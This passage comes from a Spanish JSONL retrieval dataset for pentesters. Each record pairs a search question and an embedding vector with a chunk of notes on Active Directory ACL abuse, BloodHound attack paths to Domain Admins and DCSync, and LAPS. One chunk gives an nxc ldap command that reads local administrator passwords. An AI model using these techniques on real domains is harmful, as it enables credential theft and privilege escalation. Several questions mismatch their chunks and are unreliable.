0.08357, 0.02809, 0.0808, -0.01505, 0.12065, -0.0576, 0.12163, 0.07088, -0.01572, -0.03403, 0.08728, -0.098, -0.00767, 0.01869, -0.14087, -0.14305, -0.06153, -0.04795, -0.07965, 0.18669, -0.05485, 0.03138, -0.0385, -0.10556, 0.02408, -0.0691, 0.01237, -0.01422, 0.01909, 0.03448, -0.0431, -0.10482, 0.1331, 0.01451, -0.04631, -0.0066, 0.05789, 0.02982, -0.05977, -0.12825, 0.0085, 0.04716, -0.02941, -0.01604, -0.02819, -0.10637, -0.06963, 0.06718, -0.12029, -0.07924, -0.13847, -0.02824, -0.02473, -0.03282, 0.02847, 0.00718, -0.12959, -0.00598, 0.01863, -0.04761, 0.00309, -0.04097, 0.0769, 0.07072, -0.03776, -0.04923, 0.12221, -0.03083, 0.04958, 0.03594, 0.02248, -0.03181, -0.019, 0.00743, 0.07237, 0.01651, 0.05668, 0.00219, 0.0738, -0.03532, -0.02286, 0.02029, -0.04442, 0.0492, 0.0452, -0.04972, 0.01606, 0.08386, -0.01879, -0.04162, 0.09582, -0.04799, -0.06868, 0.04461, 0.03029, 0.02567, -0.00325, -0.00649, -0.00334, -0.01276, -0.04983, -0.05871, -0.00381, -0.0206, -0.00732, -0.00196, -0.06313, -0.00439, -0.03666, -0.07465, 0.04894, -0.00826, -0.04251, -0.01048, -0.01878, 0.06637, 0.02359, 0.00428, 0.04239, -0.06696, 0.00193, -0.11207, 0.02261, -0.05378, 0.00499, -0.03351, 0.07045, 0.04992, -0.03123, 0.00643, -0.00891, 0.00534, 0.05737, -0.04888, -0.02925, 0.08572, 0.00082, 0.03326, -0.02482, -0.05101, -0.03077, -0.07013, -0.11524, -0.03543, 0.01002, -0.10362, -0.01999, 0.08847, 0.00615, 0.09519, 0.01453, 0.01154, 0.06586, -0.02906, 0.06405, 0.07983, -0.0909, 0.02334, 0.05348, -0.00263, -0.00386, 0.04153, -0.04997, 0.01722, -0.03613, 0.00394, 0.00198, 0.01245, -0.03485, -0.02588, -0.0072, 0.02503, -0.04985, 0.08113, -0.01238, 0.01871, 0.00294, -0.01419, 0.02096, -0.06376, 0.03727, -0.00526, -0.06009, 0.11263, -0.01394, 0.04841, -0.03539, 0.066, -0.04619, 0.0226, 0.0459, 0.03657, 0.08469, 0.01586, -0.0839, -0.01095, 0.01437, 0.02276, -0.03907, 0.01436, -0.02036, -0.00888, 0.08947, -0.03618, 0.01357, 0.0615, -0.03343, -0.04091, -0.0049, 0.00475, -0.01217, -0.11039, -0.06109, 0.02886, 0.01039, 0.049, -0.0508, 0.02256, 0.01446]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Las aristas peligrosas\n```\nGenericAll β†’ control total sobre el objeto\nWriteDACL β†’ te das a ti mismo cualquier permiso\nAddMember β†’ te metes en un grupo (ej. Domain Admins)\nForceChangePassword β†’ cambias la pass de otro usuario sin saber la actual\nGenericWrite β†’ modificar atributos (ej. aΓ±adir SPN β†’ Kerberoasting dirigido)\n```", "indexar": "cual es una alternativa libre a las tΓ©cnicas de Kerberoasting mediante modificaciΓ³n de atributos?", "v": [-0.00549, 0.05982, -0.04062, -0.03415, -0.03629, -0.00057, 0.04227, 0.069, -0.18792, -0.06414, -0.06673, -0.09287, -0.03155, 0.01017, 0.25679, -0.06044, 0.08744, -0.20605, 0.17761, 0.07193, 0.02347, -0.01276, -0.08631, -0.0437, -0.14241, -0.0708, 0.01087, -0.05167, -0.09959, 0.07632, -0.03444, 0.07392, 0.0471, -0.01693, -0.06435, -0.01127, 0.05285, 0.06688, 0.04047, 0.06171, 0.00201, -0.14362, -0.01739, 0.10378, 4e-05, -0.07018, -0.06732, 0.11235, -0.04596, 0.04236, 0.12292, 0.09259, -0.0939, -0.02028, 0.13977, -0.08258, 0.18081, -0.12897, -0.07861, -0.06744, 0.01594, 0.04687, -0.07333, 0.02451, 0.04825, -0.12094, -0.08017, -0.0727, -0.0571, 0.03454, 0.09943, 0.00396, 0.05777, -0.04793, -0.06653, 0.14767, -0.05224, 0.0268, 0.01059, -0.04341, -0.09672, 0.02128, -0.11996, 0.01745, -0.06193, -0.11218, 0.10668, -0.09013, 0.00684, -0.05723, 0.06813, -0.0111, 0.11035, 0.03588, -0.07891, -0.04266, -0.04089, 0.1061, 0.05977, 0.05648, 0.10051, 0.00022, -0.10726, 0.01647, 0.0665, 0.02197, -0.04621, -0.0212, -0.05152, -0.03915, -0.01627, 0.10501, -0.02673, -0.00947, 0.02896, -0.00385, -0.01764, -0.01149, -0.04103, 0.0181, -0.06211, -0.00773, 0.00165, -0.04758, -0.02122, -0.01316, 0.03143, 0.03828, -0.05192, 0.06694, 0.04201, 0.01076, -0.01897, -0.08195, -0.0698, 0.00016, 0.09583, -0.02943, -0.02019, -0.03785, -0.04228, -0.00768, 0.02014, 0.00588, 0.03163, -0.06456, -0.01027, -0.08614, -0.09963, -0.05378, -0.01527, 0.01479, -0.04005, 0.14561, -0.08514, -0.00951, -0.08769, -0.02447, -0.05985, 0.04528, -0.03465, 0.00621, -0.01051, 0.01691, 0.05177, -0.00107, 0.02187, -0.02866, -0.05821, -0.03263, 0.01226, 0.03367, 0.03527, 0.05647, 0.02613, -0.02114, -0.03283, -0.05461, -0.00762, 0.02217, 0.03345, 0.01402, -0.05247, -0.03146, 0.02584, -0.03666, -0.02286, 0.01439, 0.01454, -0.00853, -0.03276, -0.02827, -0.04921, -0.02005, -0.03721, -0.01855, -0.02866, -0.05881, -0.00915, 0.02116, -0.06366, -0.02546, -0.02673, -0.06858, 0.01041, 0.04085, -0.00594, -0.04935, -0.02745, 0.02538, 0.05739, -0.08196, 0.1238, -0.04851, -0.02811, -0.01352, 0.02365, -0.05193, -0.03029, -0.0336, 0.02787, 0.01514, 0.10182, 0.02757, -0.01133, 0.01517, 0.05906, 0.08545, -0.03262, 0.00717, 0.01089, 0.02356, 0.00502, -0.01857, 0.05789, 0.03687, 0.03296, 0.01214, 0.0195, -0.03442, 0.031, 0.04427, 0.00215, -0.03478, -0.03521, -0.03382, -0.12319, -0.04553, -0.03391, -0.01943, -0.05767, 0.00456, 0.00823, -0.01799, -0.01827, -0.062]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Encadenado\nUna arista lleva a otra β†’ BloodHound calcula el **camino** hasta Domain Admins β†’ puede acabar en DCSync.\n\nRelacionado: BloodHound Β· LAPS Β· OSCP MOC", "indexar": "que programa puedo usar para mapear los enlaces entre usuarios y dominios", "v": [0.12662, 0.0652, -0.06596, -0.17856, -0.01685, -0.02137, 0.05163, -0.10404, -0.16757, -0.07672, -0.03322, -0.15296, -0.03196, -0.18631, -0.06678, -0.04554, 0.20984, -0.02256, 0.01483, -0.08451, 0.00706, -0.05702, -0.12758, 0.00904, -0.07528, -0.02374, 0.0519, -0.16891, -0.05264, 0.03394, -0.04764, -0.0406, -0.002, -0.07322, -0.06511, -0.1338, 0.09454, 0.02217, 0.09424, 0.03986, 0.00778, -0.02899, -0.18206, -0.00687, -0.1001, 0.06483, -0.05959, -0.06306, 0.03879, -0.13373, -0.05127, -0.04249, -0.15228, -0.01845, 0.01189, -0.09402, 0.17532, -0.08935, -0.03326, -0.00878, -0.1145, -0.00438, 0.03201, 0.01999, 0.00166, -0.12372, 0.0759, 0.0287, -0.11196, 0.11256, -0.01691, 0.12618, 0.05247, 0.02811, 0.03427, 0.06393, 0.03597, -0.10835, 0.0504, -0.02508, 0.00989, 0.00827, 0.01224, 0.00555, -0.11883, -0.06528, -0.03871, -0.05027, 0.00903, -0.07169, 0.0489, 0.13662, 0.00024, 0.0183, 0.00583, -0.11266, 0.02365, 0.01141, 0.0074, 0.01365, 0.07929, 0.11862, -0.04517, 0.15574, 0.05142, 0.04441, 0.07908, -0.05895, -0.00662, 0.03947, 0.0483, -0.0409, -0.05484, -0.09677, -0.08584, 0.07132, -0.04737, -0.04253, 0.02918, -0.11876, -0.05232, -0.01696, -0.01662, 0.03265, 0.0512, 0.0389, 0.04347, 0.05625, -0.07023, -0.0381, -0.00637, 0.01044, -0.04134, -0.0335, -0.07442, 0.0179, 0.01304, -0.01347, -0.00162, 0.03772, -0.04457, 0.05314, -0.06439, -0.00811, -0.00522, -0.0412, 0.00745, -0.07874, -0.04904, -0.04938, -0.00176, 0.0095, -0.11156, 0.01594, 0.00788, 0.01933, -0.03732, -0.02072, -0.07627, -0.00373, -0.05307, 0.00784, -0.01538, 0.02535, 0.06484, -0.01075, 0.04558, 0.0474, 0.03876, 0.09023, -0.0308, 0.11805, -0.0099, -0.05364, 0.0189, 0.00862, -0.02444, 0.02474, -0.01029, 0.0053, -0.06608, -0.08937, 0.02654, 0.09182, -0.07582, 0.02423, 0.01789, 0.0539, -0.00494, 0.0081, -0.04168, 0.08763, 0.05411, 0.05136, 0.03479, -0.04575, 0.03403, 0.0215, -0.04115, -0.0447, -0.02622, -0.01283, -0.005, 0.01034, 0.01132, 0.04916, 0.01239, -0.01176, 0.05917, 0.02601, -0.01903, -0.08641, 0.025, -0.01284, -0.04931, -0.01275, 0.01695, 0.02797, 0.02083, -0.04793, -0.04682, 0.03571, -0.01688, 0.01523, 0.04901, -0.0054, 0.02233, -0.01713, -0.01245, 0.02274, -0.00346, -0.04726, -0.02198, -0.05337, 0.00133, -0.03666, -0.00047, -0.00542, 0.0005, -0.03079, -0.05409, 0.08898, 0.01536, -0.0238, -0.03722, -0.02722, -0.04389, -0.03069, -0.0058, -0.03376, -0.00304, 0.01501, 0.05593, -0.0526, -0.00524, 0.05812]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Encadenado\nUna arista lleva a otra β†’ BloodHound calcula el **camino** hasta Domain Admins β†’ puede acabar en DCSync.\n\nRelacionado: BloodHound Β· LAPS Β· OSCP MOC", "indexar": "con que herramienta calculo el camino hasta los administradores de dominio", "v": [0.13735, 0.02523, -0.10016, -0.12253, -0.03913, -0.12583, 0.12683, -0.00012, -0.2318, 0.00461, 0.03061, -0.07837, -0.01202, -0.13302, 0.08544, 0.03546, 0.18137, -0.10781, -0.01653, -0.01069, 0.05155, -0.07041, 0.02354, 0.05983, -0.08117, -0.09494, 0.01776, -0.07042, -0.0667, 0.16519, 0.06399, 0.03715, 0.08643, -0.10176, 0.05399, -0.07289, -0.0601, 0.09931, -0.00456, 0.13283, -0.02664, -0.00264, -0.15735, -0.04465, -0.08622, -0.01376, -0.03772, -0.08035, 0.05027, -0.04521, -0.00209, -0.16889, -0.13573, -0.0248, 0.04151, -0.03705, 0.16746, -0.04652, 0.04566, -0.09648, -0.02582, 0.02002, 0.01149, 0.06493, -0.03911, -0.05847, 0.05633, -0.00574, -0.04123, 0.0348, -0.01702, 0.06017, -0.03513, 0.01952, 0.05174, -0.0139, 0.10744, 0.06837, 0.0781, -0.09278, 0.04375, -0.03298, -0.08813, -0.02107, -0.18524, -0.16639, -0.01987, -0.08508, 0.07549, 0.00108, -0.05868, -0.01915, -0.03092, 0.01747, -0.07001, 0.05324, 0.07856, -0.0708, -0.04409, -0.01669, 0.10407, 0.08463, -0.08658, 0.02622, 0.03213, 0.15015, 0.05347, -0.07393, -0.04969, 0.02452, 0.03684, 0.01092, 0.00967, -0.0633, 0.00856, 0.12896, -0.07714, -0.01963, -0.02472, -0.115, -0.01203, -0.02714, -0.02895, 0.04563, 0.06682, -0.01424, -0.00518, 0.03808, 0.03172, -0.12185, -0.05382, -0.07117, -0.04962, 0.01341, -0.09183, 0.058, -0.02334, -0.01966, 0.01705, -0.03289, -0.03874, 0.01333, -0.07335, -0.14642, 0.08722, -0.02445, 0.03167, -0.07495, -0.03813, 0.00759, -0.02834, 0.01243, -0.03707, 0.11225, -0.02792, 0.03391, -0.03712, 0.05201, -0.08592, 0.05892, -0.02021, -0.05079, 0.02038, 0.06469, 0.02929, -0.05911, 0.03541, 0.01204, 0.02398, -0.01567, -0.05268, 0.00518, 0.03734, 0.02021, 0.00813, -0.0393, -0.05391, -0.02914, 0.03619, 0.00407, -0.03082, -0.02739, 0.01968, 0.04475, -0.07518, 0.03164, -0.00098, 0.05371, -0.01202, 0.07387, 0.05775, 0.04942, -0.001, -0.03198, 0.00801, -0.00425, 0.03762, -0.01966, 0.00368, 0.00636, -0.00564, -0.0394, 0.00736, -0.0048, -0.0025, 0.04682, -0.01494, 0.05307, -0.01336, 0.03097, -0.00862, -0.04724, 0.02117, -0.05023, 0.00577, 0.00431, -0.02028, -0.01343, -0.03552, -0.03258, -0.02633, 0.05782, 0.01999, -0.07008, -0.00219, -0.01408, 0.00437, 0.0208, -0.00553, 0.00363, -0.03354, -0.0193, 0.00799, -0.00874, 0.05134, -0.02159, 0.06507, -0.036, -0.06154, -0.01142, -0.01729, 0.04316, 0.08684, -0.04615, -0.06769, -0.04905, -0.02238, 0.01549, -0.06731, -0.05213, 0.00047, 0.00297, 0.02958, 0.0125, -0.04251, -0.01169]} -{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Encadenado\nUna arista lleva a otra β†’ BloodHound calcula el **camino** hasta Domain Admins β†’ puede acabar en DCSync.\n\nRelacionado: BloodHound Β· LAPS Β· OSCP MOC", "indexar": "cual es un software libre para visualizar las relaciones de acceso en una red corporativa", "v": [-0.09876, 0.03589, -0.04022, -0.21723, -0.00051, -0.15856, 0.07535, -0.03947, -0.07379, -0.12095, -0.07253, -0.15636, -0.06617, -0.08601, 0.05615, 0.05978, 0.12601, -0.0947, 0.02676, 0.02408, 0.06035, -0.07488, -0.06683, 0.01439, 0.08412, 0.00674, 0.13726, -0.08064, 0.06524, 0.06427, 0.09235, -0.01986, 0.05478, 0.0561, -0.04631, 0.05526, -0.00402, 0.03099, 0.01427, -0.03329, 0.07013, -0.02593, -0.05201, 0.02562, 0.15743, -0.01501, -0.07193, 0.02967, -0.05427, 0.07039, -0.05879, 0.01396, -0.10596, -0.07715, 0.05812, -0.06024, 0.07281, 0.005, -0.0134, -0.02644, -0.05456, 0.08311, 0.05566, 0.02719, -0.07945, -0.07016, 0.05217, -0.05866, -0.11622, 0.02126, 0.00738, -0.03732, -0.11288, -0.04264, 0.02296, 0.03648, -0.0992, 0.02504, -0.0103, -0.00042, 0.06075, 0.01476, -0.03725, 0.08423, -0.08625, -0.09514, 0.09937, -0.06286, 0.04538, -0.0413, 0.0883, -0.02867, -0.11001, 0.03292, -0.01898, -0.02933, 0.00481, 0.00718, -0.03837, 0.10128, -0.08401, 0.02753, -0.12808, 0.00237, -0.12507, -0.03988, -0.04629, -0.1002, 0.02756, 0.01062, 0.00708, 0.01425, 0.01707, -0.00191, -0.03034, -0.08663, 0.01931, -0.07693, -0.00809, -0.05182, -0.01977, -0.09666, -0.01708, -0.00071, -0.04619, -0.0005, 0.04257, 0.11259, -0.0762, 0.01093, -0.08786, -0.0363, -0.12814, -0.06917, -0.03787, -0.02959, 0.03523, -0.02819, 0.07454, -0.08006, -0.03524, 0.00746, -0.02973, -0.02723, 0.12012, 0.08659, 0.03129, -0.05151, -0.03799, 0.11482, -0.04231, -0.01286, -0.09635, 0.02271, -0.04201, 0.03939, -0.02141, 0.01213, -0.00098, 0.07095, -0.0057, 0.00492, -0.07093, 0.04647, 0.06694, 0.0002, -0.08333, -0.01116, 0.04835, 0.0458, 0.00883, 0.05024, -0.04218, -0.08335, -0.03121, -0.08639, -0.0026, -0.14529, -0.01775, -0.09676, -0.02004, -0.02076, -0.00607, 0.0043, -0.0652, -0.02991, -0.05146, -0.00064, 0.02832, -0.05854, -0.02721, 0.04133, -0.01231, -0.05705, 0.11873, -0.03045, -0.0559, -0.03196, -0.00444, -0.02293, -0.05129, -0.10524, -0.03648, -0.02427, 0.05794, 0.06333, 0.04543, 0.09299, -0.06192, 0.08517, -0.006, 0.01573, 0.05429, -0.01353, -0.14133, -0.06708, 0.06738, 0.00731, 0.08649, 0.00366, 0.08374, -0.01941, 0.09688, -0.06316, 0.01693, -0.00926, -0.00576, 0.03846, -0.04757, -0.00496, -0.01192, 0.06145, -0.03026, -0.05195, 0.04735, 0.01949, 0.03947, -0.05723, -0.01878, -0.07569, 0.07213, 0.06102, -0.04652, -0.04282, -0.07626, -0.0496, -0.08794, -0.0035, -0.02009, -0.05158, -0.04954, 0.05919, 0.04998, 7e-05, -0.01284, -0.0092]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "indexar": "que programa sirve para obtener las contraseΓ±as locales de los equipos?", "v": [0.08723, 0.03073, -0.11442, -0.25725, 0.00447, -0.21513, 0.06724, -0.09219, -0.04939, -0.07437, -0.09109, 0.03963, -0.01063, -0.11386, 0.04986, 0.03266, 0.12496, -0.06464, 0.0703, 0.092, -0.02444, 0.01784, -0.07672, 0.02578, 0.0134, 0.01918, 0.0857, -0.07638, -0.10649, 0.03105, 0.0279, 0.0235, 0.02123, -0.02414, 0.02348, -0.00056, 0.00672, 0.07394, -0.05772, 0.04861, 0.1191, -0.01588, -0.15712, -0.01716, 0.06606, 0.02128, -0.01307, 0.10328, 0.09439, -0.08725, -0.08442, -0.00079, -0.0031, -0.13953, -0.02119, -0.10526, 0.0038, -0.09297, -0.08584, 0.01652, -0.12756, -0.08573, 0.02905, 0.01499, 0.04826, 0.00028, 0.05848, 0.00896, -0.0934, -0.01632, -0.06132, 0.01423, 0.06543, -0.03655, -0.00448, 0.05224, -0.00661, 0.03279, 0.08305, -0.02456, -0.03668, 0.02347, 0.03719, 0.01176, -0.0926, 0.00106, 0.10428, -0.03317, 0.08156, -0.09174, 0.0468, 0.02078, 0.02155, 0.03716, 0.03371, -0.074, 0.14048, 0.05616, -0.03724, 0.08133, 0.01466, -0.03929, -0.04667, 0.12959, -0.03128, 0.03155, 0.1111, 0.03576, 0.03727, -0.03362, 0.05492, 0.01716, -0.05708, 0.03358, -0.04779, -0.04055, -0.01598, -0.04846, 0.13012, 0.08253, -0.10054, -0.05136, -0.03486, 0.03895, 0.03853, 0.04881, 0.01759, 0.0017, -0.0273, 0.04226, 0.04721, 0.01123, -0.0089, 0.07427, -0.12066, -0.02439, 0.0568, -0.07654, -0.08922, -0.01242, 0.00566, 0.06155, 0.02827, 0.01251, 0.05134, 0.06044, 0.03599, -0.06792, 0.00644, 0.03917, -0.00919, -0.00423, -0.06354, 0.05836, -0.10903, 0.05316, 0.01903, -0.07546, -0.08275, 0.12869, -0.03709, -0.07802, -0.00452, -0.0166, -0.02894, -0.07572, 0.00579, 0.06616, 0.14671, 0.10269, -0.02488, 0.07619, 0.00142, -0.09292, -0.05435, 0.02916, 0.04504, -0.11329, 0.02577, -0.05163, -0.05843, 0.05025, 0.02255, 0.05699, -0.01122, -0.02385, -0.00358, 0.00027, -0.03091, -0.03962, 0.04013, -0.05691, -0.03574, 0.01823, -0.0049, 0.00967, -0.04461, -0.01931, 0.00547, -0.07969, -0.06151, 0.03065, -0.03388, 0.00376, 0.07039, 0.14103, -0.09077, -0.04343, -0.02701, 0.12053, 0.00304, -0.02741, -0.00941, -0.00157, -0.06803, -0.09491, -0.02719, 0.01575, 0.00518, 0.04221, 0.02347, -0.01607, 0.04125, 0.07913, 0.01802, -0.08625, 0.01035, 0.05087, 0.07543, -0.00301, -0.03267, -0.00472, -0.04482, 0.01569, 0.03996, -0.01487, -0.02273, -0.01386, -0.01999, -0.08112, -0.03206, 0.07319, -0.01801, -0.07101, -0.06075, 0.01596, -0.06819, -0.02665, 0.05707, 0.01935, -0.05949, 0.05459, 0.03032, 0.00913, 0.02247, 0.02219]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "indexar": "cual es una tecnica para robar la pass del administrador local?", "v": [0.0465, -0.05114, -0.02979, -0.18604, -0.06357, -0.02706, 0.16194, 0.0592, -0.05127, 0.06645, -0.09545, -0.17166, 0.13136, 0.02893, 0.14395, -0.00987, -0.00205, 0.01742, 0.08792, 0.08647, -0.02431, 0.07416, 0.07044, 0.08761, 0.10415, -0.04364, 0.04891, -0.13658, -0.18261, -0.00996, 0.03806, -0.02362, 0.02276, -0.02599, -0.01693, 0.02394, 0.12397, -0.00302, -0.05655, 0.1338, -0.01103, -0.0553, -0.14155, 0.02568, 0.13018, -0.05584, 0.00461, -0.04911, 0.13819, 0.07189, -0.02641, -0.02499, -0.03493, -0.07405, 0.00333, -0.0222, 0.06614, -0.00392, 0.07771, -0.02093, -0.09022, 0.00843, -0.08102, 0.04103, 0.04798, -0.06634, 0.07646, -0.0499, 0.00921, 0.01477, 0.00353, 0.08958, -0.04667, 0.10631, -0.00586, 0.07912, -0.04352, 0.08029, 0.09795, -0.03982, -0.01115, 0.06398, -0.11492, 0.0262, -0.08402, -0.08743, 0.1123, -0.09987, 0.0263, 0.00401, 0.02136, -0.0343, 0.03856, -0.06735, -0.04163, -0.09121, 0.08387, 0.06416, -0.12844, 0.04106, 0.00975, -0.08321, -0.14793, 0.15586, -0.00991, 0.06087, 0.0038, 0.02617, 0.04034, -0.07937, -0.04646, 0.0235, -0.05551, 0.1087, -0.01495, 0.00155, -0.02556, -0.0297, -0.10106, 0.01326, 0.0229, -0.06274, 0.01565, -0.04582, 0.06542, -0.01016, 0.09249, 0.1076, -0.01592, 0.00754, 0.00524, -0.00416, -0.00396, -0.01373, -0.07833, 0.03125, 0.03324, -0.11513, -0.09276, 0.01407, -0.12761, 0.05713, 0.00209, 0.09011, 0.08457, 0.01493, 0.00736, -0.0496, -0.04782, -0.02125, -0.01412, -0.03323, -0.05601, 0.08606, -0.01154, 0.05446, 0.08001, -0.07321, -0.07353, 0.06835, 0.01583, 0.00832, -0.02266, -0.03953, -0.09884, -0.08735, -0.01593, 0.01347, 0.03701, -0.11456, 0.0077, 0.01268, -0.03519, 0.02379, 0.00842, -0.03057, 0.02244, -0.05404, 0.00529, -0.06472, -0.01565, 0.08377, 0.07038, 0.08971, -0.05961, -0.02772, 0.04612, 0.0381, -0.03644, -0.00094, 0.05088, -0.07071, -0.06451, 0.03448, -0.02551, -0.04708, -0.00862, -0.01414, -0.01886, 0.00189, 0.01144, 0.01224, -0.05591, -0.00307, 0.05601, 0.00933, 0.00031, -0.05776, -0.0566, 0.03535, 0.04887, 0.02873, 0.0395, 0.00167, -0.01716, -0.03369, -0.01304, 0.00292, -0.05603, -0.0546, 0.081, -0.00945, 0.04718, 0.00571, 0.00456, -0.00393, -0.05687, 0.00831, -0.0204, 0.03688, -0.04585, 0.03101, -0.03871, -0.00281, 0.02474, 0.00401, 0.0284, -0.035, 0.03034, -0.08505, 0.01292, 0.08531, -0.01405, -0.07367, -0.09982, 0.03071, -0.09715, 0.01952, -0.00776, -0.03322, 0.07852, 0.00709, -0.00558, 0.01055, -0.00726, -0.0518]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "indexar": "como puedo acceder al usuario admin local si tengo permisos en Active Directory?", "v": [0.01242, 0.14187, -0.13372, -0.23536, 0.02086, -0.02231, -0.11093, -0.03173, -0.20788, -0.05078, 0.02455, -0.08577, -0.02063, -0.07674, 0.09194, -0.09538, 0.16767, -0.00818, 0.01366, 0.03607, 0.08282, 0.07601, -0.09499, 0.11605, 0.0938, 0.00156, 0.06556, -0.08902, -0.06064, -0.09672, 0.09363, 0.01392, 0.02534, -0.03902, 0.07214, -0.03184, -0.01428, 0.06007, 0.03318, 0.03676, 0.01093, 0.04029, -0.16615, 0.07187, -0.00155, 0.09538, -0.0238, -0.12383, 0.00598, 0.03433, -0.07563, -0.1185, -0.13257, -0.10801, 0.03492, 0.03406, 0.1441, -0.14117, -0.00241, -0.04974, -0.03195, -0.03517, -0.0158, 0.06761, -0.06915, 0.00212, 0.17208, 0.02884, -0.07671, 0.10599, -0.02506, 0.00684, 0.04411, 0.02772, 0.06256, -0.0426, -0.01452, -0.02874, 0.01265, 0.04415, 0.06852, 0.02831, -0.00304, -0.05435, -0.14268, -0.17383, 0.03578, -0.17827, 0.01201, -0.0034, 0.10319, 0.00889, 0.00209, 0.02206, -0.03328, -0.0238, -0.04813, 0.04143, -0.05312, 0.00954, -0.01778, 0.05773, 0.00661, 0.15616, 0.02208, 0.02371, 0.00442, 0.00411, -0.03718, 0.01419, 0.01773, 0.00294, -0.07553, -0.02505, 0.03713, 0.14023, -0.07722, -0.11947, -0.04234, 0.02619, -0.04897, -0.06265, 0.07004, 0.01421, 0.01837, -0.00212, -0.01992, 0.0941, -0.05402, 0.00784, 0.0127, 0.05916, 0.08059, -0.01879, -0.03618, 0.03312, -0.05677, 0.01037, -0.03499, -0.02568, -0.04313, -0.01492, 0.02779, 0.03581, 0.03194, 0.01838, -0.07745, 0.00839, -0.035, -0.03573, -0.01055, -0.03125, -0.02013, 0.05117, 0.0096, 0.11261, -0.02982, -0.06066, 0.03141, 0.07482, 0.02935, 0.06946, -0.01976, 0.0299, -0.07217, -0.01503, -0.10786, -0.03946, 0.0479, 0.03656, -0.09007, 0.07974, -0.02283, -0.13417, 0.04277, -0.04431, 0.01037, -0.03698, 0.02678, -0.00362, -0.00921, 0.01223, -0.08596, 0.00534, -0.01631, -0.02653, 0.02096, -0.02325, 0.02897, 0.03821, 0.01388, 0.06357, 0.00167, -0.03217, 0.00766, -0.0568, -0.01765, 0.03371, -0.04333, -0.0722, 0.01021, 0.05049, -0.04057, -0.03253, 0.03992, 0.00189, -0.02984, 0.09455, 0.02949, -0.00309, -0.02622, -0.05572, 0.07647, 0.02604, -0.04195, 0.01034, 0.03727, 0.00948, -0.01529, -0.01574, 0.03239, 0.04681, 0.05721, 0.03977, 0.0794, -0.00746, 0.06448, -0.04088, 0.03923, 0.09896, -0.03431, 0.02033, -0.03845, -0.02432, 0.04115, 0.01682, 0.0342, 0.01002, -0.01953, 0.00254, 0.01313, 0.05244, 0.03538, 0.01034, -0.05039, -0.04122, -0.05442, -0.01447, -0.02641, -0.05893, 0.03686, 0.03624, 0.02589, -0.00984, 0.00047, 0.02075]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o:\nnxc ldap IP -u usuario -p password -M laps\n```\n- El atributo es `ms-Mcs-AdmPwd` (LAPS v1).", "indexar": "ΒΏQuΓ© programa puedo usar para gestionar las contraseΓ±as locales de los servidores?", "v": [-0.04878, 0.05574, -0.07569, -0.25934, -0.00611, -0.1157, 0.05349, -0.15602, -0.08211, -0.07475, -0.13303, 0.00846, -0.01526, -0.10531, -0.01281, 0.01809, 0.15974, -0.08101, 0.02564, 0.0955, -0.04067, 0.01086, -0.0049, 0.06095, -0.04799, 0.01591, 0.14805, -0.16447, -0.06011, -0.00949, -0.0258, -0.04066, 0.04685, -0.04587, 0.01777, 0.07769, -0.01442, 0.12677, -0.01231, 0.07268, 0.12532, 0.01747, -0.13051, -0.00275, 0.08265, 0.01147, 0.02498, -0.0728, 0.05391, -0.03193, -0.15568, -0.09012, -0.02608, -0.05137, 0.01337, -0.05953, 0.00379, -0.08454, -0.04405, 0.03879, -0.14463, 0.02937, 0.00648, 0.08659, 0.00118, -0.10486, 0.10279, -0.00436, -0.14663, 0.07017, -0.06513, 0.04133, 0.00477, 0.01541, 0.03424, 0.08296, -0.00077, -0.02954, 0.10826, 0.04932, -0.06695, 0.03651, 0.05785, 0.02199, -0.14246, -0.02928, 0.04701, -0.06238, 0.0243, -0.01754, -0.00953, -0.01571, 0.02332, 0.00821, -0.00165, -0.04349, 0.09218, 0.02122, -0.05567, 0.03903, 0.03424, -0.01172, -0.02049, 0.15684, -0.03578, 0.05602, 0.08253, -0.03579, 0.03975, -0.07312, 0.03778, -0.03395, -0.09273, 0.02183, -0.0531, -0.00207, 0.02265, -0.0533, 0.09056, 0.05828, -0.09447, -0.02995, 0.0574, 0.03633, 0.13742, 0.03671, 0.06804, 0.07269, -0.06549, -0.0032, -0.00734, -0.01919, -0.02162, -0.0027, -0.0728, -0.00384, 0.07842, -0.06784, -0.0658, -0.02472, -0.08364, 0.04176, -0.00792, 0.03802, 0.09173, 0.01028, 0.05442, -0.05378, -0.01751, 0.04694, 0.04403, -0.07466, -0.05112, 0.04517, -0.10998, 0.02373, 0.04615, -0.08493, -0.13659, 0.07747, -0.00635, -0.03325, -0.03343, 0.07461, -0.0088, -0.05124, 0.01456, 0.10416, 0.0726, 0.08583, 0.00539, 0.10407, 0.01645, -0.05732, -0.0099, -0.05409, -0.03066, 